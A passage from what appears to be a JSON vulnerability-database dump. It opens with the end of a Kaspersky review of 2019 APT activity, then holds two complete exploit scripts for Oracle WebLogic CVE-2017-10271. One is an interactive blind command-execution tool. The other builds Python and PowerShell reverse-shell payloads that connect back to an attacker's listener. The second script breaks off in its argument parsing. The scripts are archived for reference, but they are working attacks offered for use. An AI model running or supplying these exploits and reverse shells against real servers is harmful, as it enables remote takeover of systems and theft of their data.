calls, but also to exploit previously unknown vulnerabilities in the operating system, which allowed them to install applications on the device. WhatsApp quickly released a patch for the exploit \u2013 and that seemed to be that. However, in October, the company filed a [lawsuit accusing Israel-based NSO Group of having created the exploit](<https://techcrunch.com/2019/10/29/whatsapp-spyware-nso-group/>). WhatsApp claims that the technology sold by NSO was used to target the mobile phones of more than 1,400 of its customers in 20 different countries, including human rights activists, journalists and others. NSO denies the allegations.\n\nIn July, we published a private report about the latest versions of FinSpy for Android and iOS, developed in mid-2018. The developers of FinSpy sell the software to government and law enforcement organizations all over the world, who use it to collect a variety of private user information on various platforms. The mobile implants are similar for iOS and Android. They are capable of collecting personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges on an unrooted device by abusing known vulnerabilities. It seems that the iOS solution does not provide infection exploits for its customers, but is fine-tuned to clean traces of publicly available jailbreaking tools: this suggests that physical access to the victim's device is required in cases where devices are not already jailbroken. The latest version includes multiple features that we have not observed before. During our recent research, we detected up-to-date versions of these implants in the wild in almost 20 countries, but the size of the customer base would suggest that the real number of victims could be much higher.\n\nIn August, Google's Project Zero team published an extensive [analysis of at least 14 iOS zero-days](<https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html>) found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. According to Google, the attackers used a number of 'water-holed' websites to deliver the exploits \u2013 possibly from as long as three years ago. While the blog contained no details about the compromised sites, or whether they were still active, Google claimed the websites had received \"thousands of visitors per week\". The lack of victim discrimination points to a relatively non-targeted attack. However, the not-so-high estimate of the number of visitors to the water-holed sites, and the capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication.\n\nIn September, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS \u2013 the company is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has also reduced payouts for Apple one-click exploits. On the same day, someone found a high-severity zero-day in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message. Whatever the relative value of Android and iOS exploits, it's clear that mobile exploits are a valuable commodity.\n\n## Established threat actors continue to revamp their tools\n\nWhile investigating some malicious activity in Central Asia, we identified a new backdoor, named Tunnus, which we attribute to Turla. This is.NET-based malware with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the threat actor has built its C2 infrastructure with vulnerable WordPress installations.\n\nThis year, Turla also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the threat actor is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. The group uses two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 for cyber-espionage; we believe Turla deploys these versions where their targets are protected with security software capable of detecting KopiLuwak.\n\nWe also observed a [new COMpfun-related targeted campaign](<https://securelist.com/compfun-successor-reductor/93633/>) using new malware. The Kaspersky Threat Attribution Engine shows strong code similarities between the new family and the old COMpfun. Moreover, the attackers use the original COMpfun as a downloader in one of the spreading mechanisms. We named the newly identified modules Reductor after a.pdb path left in some of the samples. We believe the same COMPfun authors, who we tentatively associate with Turla based on victimology, developed this malware. One striking aspect of Reductor is that the threat actors put a lot of effort into manipulating installed digital root certificates and marking outbound TLS traffic with unique host-related identifiers. The malware adds embedded root certificates to the target host and allows operators to add additional ones remotely through a named pipe. The authors don't touch the network packets at all. Instead, they analyze Firefox source and Chrome binary code to patch the corresponding system pseudo-random number generation (PRNG) functions in the process's memory. Browsers use PRNG to generate the 'client random' sequence during the very beginning of the TLS handshake. Reductor adds the victims' unique encrypted hardware- and software-based identifiers to this 'client random' field.\n\nZebrocy has continued adding new tools to its arsenal using various kinds of programming languages. We found Zebrocy deploying a compiled Python script, which we call PythocyDbg, within a Southeast Asian foreign affairs organization. This module primarily provides for the stealthy collection of network proxy and communications debug capabilities. In early 2019, Zebrocy shifted its development efforts with the use of Nimrod/Nim, a programming language with syntax resembling both Pascal and Python that can be compiled down to JavaScript or C targets. Both the Nim downloaders that the group mainly uses for spear phishing, and other Nim backdoor code, are currently being produced by Zebrocy and delivered alongside updated compiled AutoIT scripts, Go, and Delphi modules. In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file-sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\nIn June, we came across an unusual set of samples used to target diplomatic, government and military organizations in countries in South and Southeast Asia that we attribute to Platinum \u2013 one of the most technologically advanced APT actors. In this campaign, the attackers used an elaborate, previously unseen steganographic technique to conceal communication. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and this campaign provides proof. Interestingly, the attackers decided to implement the utilities they need as one huge set \u2013 an example of the framework-based architecture that is becoming more and more popular. Later in the year, [we discovered Platinum using a new backdoor, which we call Titanium](<https://securelist.com/titanium-the-platinum-group-strikes-again/94961/>), in a new campaign. Interestingly, we found certain similarities between this malware and a toolset that we called ProjectC. We detected ProjectC in 2016 being used as a toolset for lateral movement and we attributed it with low confidence to CloudComputating. Our new findings lead us to believe that the CloudComputating set of activities can be attributed to Platinum and that ProjectC was one of its toolsets.\n\nOne of the key findings of our 2018 report on [Operation AppleJeus](<https://securelist.com/operation-applejeus/87553/>) was the ability of the Lazarus group to target Mac OS. Since then, Lazarus has expanded its operations for this platform. This year, we discovered a new operation, active for at least a year, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers. Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. It's clear that Lazarus keeps updating its tools very quickly.\n\nIn Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nAndariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.\n\nIn October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.\n\nThe Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows \u2013 including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.\n\nEarly in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geo-political activity in the region.\n\nThe Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.\n\n## Evolution of the 'newcomers'\n\nWe first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and \u2013 somewhat surprisingly \u2013 in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nIn February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows \u2013 the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FrutiyArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.\n\nDuring February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.\n\nIn February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.\n\nIn Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.\n\n## Privacy matters\n\nOn January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.\n\nIn February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same market place. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).\n\nStolen credentials, along with other personal information harvested from data leaks, is valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.\n\nWe've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.\n\nMoreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information \u2013 information that would prove very valuable to criminals and APT threat actors alike.\n\n## Final thoughts\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)", "modified": "2019-12-04T10:00:22", "published": "2019-12-04T10:00:22", "id": "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "href": "https://securelist.com/ksb-2019-review-of-the-year/95394/", "type": "securelist", "title": "APT review: what the world\u2019s threat actors got up to in 2019", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "edition": 1, "published": "2017-12-26T00:00:00", "title": "Oracle WebLogic Server 10.3.6.0.0 12.x - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2017-12-26T00:00:00", "id": "EXPLOITPACK:C22F157FABAD412B7D508C7EEC750856", "href": "", "sourceData": "import requests\nimport sys\n\nurl_in = sys.argv[1]\npayload_url = url_in + \"/wls-wsat/CoordinatorPortType\"\npayload_header = {'content-type': 'text/xml'}\n\n\ndef payload_command (command_in):\n html_escape_table = {\n \"&\": \"&\",\n '\"': \"\"\",\n \"'\": \"'\",\n \">\": \">\",\n \"<\": \"<\",\n }\n command_filtered = \"<string>\"+\"\".join(html_escape_table.get(c, c) for c in command_in)+\"</string>\"\n payload_1 = \"<soapenv:Envelope xmlns:soapenv=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\"> \\n\" \\\n \" <soapenv:Header> \" \\\n \" <work:WorkContext xmlns:work=\\\"http://bea.com/2004/06/soap/workarea/\\\"> \\n\" \\\n \" <java version=\\\"1.8.0_151\\\" class=\\\"java.beans.XMLDecoder\\\"> \\n\" \\\n \" <void class=\\\"java.lang.ProcessBuilder\\\"> \\n\" \\\n \" <array class=\\\"java.lang.String\\\" length=\\\"3\\\">\" \\\n \" <void index = \\\"0\\\"> \" \\\n \" <string>cmd</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"1\\\"> \" \\\n \" <string>/c</string> \" \\\n \" </void> \" \\\n \" <void index = \\\"2\\\"> \" \\\n + command_filtered + \\\n \" </void> \" \\\n \" </array>\" \\\n \" <void method=\\\"start\\\"/>\" \\\n \" </void>\" \\\n \" </java>\" \\\n \" </work:WorkContext>\" \\\n \" </soapenv:Header>\" \\\n \" <soapenv:Body/>\" \\\n \"</soapenv:Envelope>\"\n return payload_1\n\ndef do_post(command_in):\n result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)\n\n if result.status_code == 500:\n print \"Command Executed \\n\"\n else:\n print \"Something Went Wrong \\n\"\n\n\n\nprint \"***************************************************** \\n\" \\\n \"**************** Coded By 1337g ****************** \\n\" \\\n \"* CVE-2017-10271 Blind Remote Command Execute EXP * \\n\" \\\n \"***************************************************** \\n\"\n\nwhile 1:\n command_in = raw_input(\"Eneter your command here: \")\n if command_in == \"exit\" : exit(0)\n do_post(command_in)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "edition": 1, "published": "2018-01-03T00:00:00", "title": "Oracle WebLogic 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-03T00:00:00", "id": "EXPLOITPACK:E47A4ABCB334901131160C872A570166", "href": "", "sourceData": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\n# Date Authored: Jan 3, 2018\n# Date Announced: 10/19/2017\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\n# Exploit is based off of POC by Luffin from Github\n# https://github.com/Luffin/CVE-2017-10271\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\n# CVE: CVE-2017-10271\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\n# (Python 3) Example check listener: python3 -m http.server 4444\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\n# (Netcat) Example exploit listener: nc -nlvp 4444\n\nfrom sys import exit\nfrom requests import post\nfrom argparse import ArgumentParser\nfrom random import choice\nfrom string import ascii_uppercase, ascii_lowercase, digits\nfrom xml.sax.saxutils import escape\n\nclass Exploit:\n\n def __init__(self, check, rhost, lhost, lport, windows):\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n self.lhost = lhost\n self.lport = lport\n self.check = check\n if windows:\n self.target = 'win'\n else:\n self.target = 'unix'\n\n if self.target == 'unix':\n # Unix reverse shell\n # You should also be able to instead use something from MSFVenom. E.g.\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n ).format(lhost=self.lhost, lport=self.lport)\n else:\n # Windows reverse shell\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\n self.cmd_payload = (\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n )\n self.cmd_payload = escape(self.cmd_payload)\n\n def cmd_base(self):\n if self.target == 'win':\n return 'cmd'\n return '/bin/sh'\n\n def cmd_opt(self):\n if self.target == 'win':\n return '/c'\n return '-c'\n\n\n def get_generic_check_payload(self):\n random_uri = ''.join(\n choice(ascii_uppercase + ascii_lowercase + digits)\n for _ in range(16))\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n <object id=\"url\" class=\"java.net.URL\">\n <string>http://{lhost}:{lport}/{random_uri}</string>\n </object>\n <object idref=\"url\">\n <void id=\"stream\" method = \"openStream\" />\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n\n return generic_check_payload.format(\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\n\n def get_process_builder_payload(self):\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header>\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n <java>\n <object class=\"java.lang.ProcessBuilder\">\n <array class=\"java.lang.String\" length=\"3\" >\n <void index=\"0\">\n <string>{cmd_base}</string>\n </void>\n <void index=\"1\">\n <string>{cmd_opt}</string>\n </void>\n <void index=\"2\">\n <string>{cmd_payload}</string>\n </void>\n </array>\n <void method=\"start\"/>\n </object>\n </java>\n </work:WorkContext>\n </soapenv:Header>\n <soapenv:Body/>\n</soapenv:Envelope>\n'''\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\n cmd_payload=self.cmd_payload)\n\n def print_banner(self):\n print(\"=\" * 80)\n print(\"CVE-2017-10271 RCE Exploit\")\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\n print(\"Shell Listener: {lhost}:{lport}\".format(\n lhost=self.lhost, lport=self.lport))\n print(\"=\" * 80)\n\n def post_exploit(self, data):\n headers = {\n \"Content-Type\":\n \"text/xml;charset=UTF-8\",\n \"User-Agent\":\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\n }\n payload = \"/wls-wsat/CoordinatorPortType\"\n\n vulnurl = self.url + payload\n try:\n req = post(\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\n if self.check:\n print(\"[*] Did you get an HTTP GET request back?\")\n else:\n print(\"[*] Did you get a shell back?\")\n except Exception as e:\n print('[!] Connection Error')\n print(e)\n\n def run(self):\n self.print_banner()\n if self.check:\n print('[+] Generating generic check payload')\n payload = self.get_generic_check_payload()\n else:\n print('[+] Generating execution payload')\n payload = self.get_process_builder_payload()\n print('[*] Generated:')\n print(payload)\n if self.check:\n print('[+] Running generic check payload')\n else:\n print('[+] Running {target} execute payload').format(target=self.target)\n\n self.post_exploit(data=payload)\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\n )\n parser.add_argument(\n '-l',\n '--lhost',\n required=True,\n dest='lhost',\n nargs='?',\n help='The listening host that the remote server should connect back to')\n parser.add_argument(\n '-p',\n '--lport',\n required=True,\n dest='lport',\n nargs='?',\n help='The listening port that the remote server should connect back to')\n parser.add_argument(\n '-r',\n '--rhost',\n required=True,\n dest='rhost',\n nargs='?',\n help='The remote host base URL that we should send the exploit to')\n parser.add_argument(\n '-c',\n '--check',\n dest='check',\n action='store_true',\n help=\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\n )\n 